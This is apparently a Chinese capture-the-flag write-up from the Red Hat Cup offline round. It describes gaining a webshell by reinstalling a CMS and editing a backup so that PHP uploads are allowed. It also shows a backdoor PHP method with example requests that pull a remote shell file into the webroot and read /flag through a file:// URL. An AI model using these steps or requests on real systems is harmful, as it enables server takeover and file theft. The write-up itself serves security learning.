红帽杯线下部分 writeup

粤湾期货

  • 首先直奔install.php发现源码中并没有做出重装限制,并且在config.php可以知道数据库和账号密码直接重装系统拿下后台。
  • 拿下后台发现系统设置处可以修改上传文件类型。

img

  • 但是加入php后缀你发现会将phpt替换为X,从源码中可有很直观看到这点。

img

  • 此时毫无头绪,代码审计数量太大,所以黑盒测试一下,发现数据备份处可以执行sql语句。本以为可以直接写文件,但是失败了,联想到上面上传文件后缀我们可以直接在备份文件里面修改后缀是PHP,最后直接getshell即可。

img

  • 导入备份后发现设置中的上传后缀有php

img

  • 直接上传php文件直接getshell

img

粤湾基金

/index.php/home/test存在一处后门直接可getflag

// /Home/Test/dlfile?file_url=http://xxxx/shell.txt&save_to=/var/www/html/shell.php
///Home/Test/dlfile?file_url=file:///flag&save_to=/var/www/html/1.txt
    // 下载图片
public function dlfile($file_url, $save_to)
{
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_POST, 0); 
        curl_setopt($ch,CURLOPT_URL,$file_url); 
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
        $file_content = curl_exec($ch);
        curl_close($ch);
        $downloaded_file = fopen($save_to, 'w');
        fwrite($downloaded_file, $file_content);
        fclose($downloaded_file);
}
本文总阅读量
× 文章目录
  1. 1. 粤湾期货
  2. 2. 粤湾基金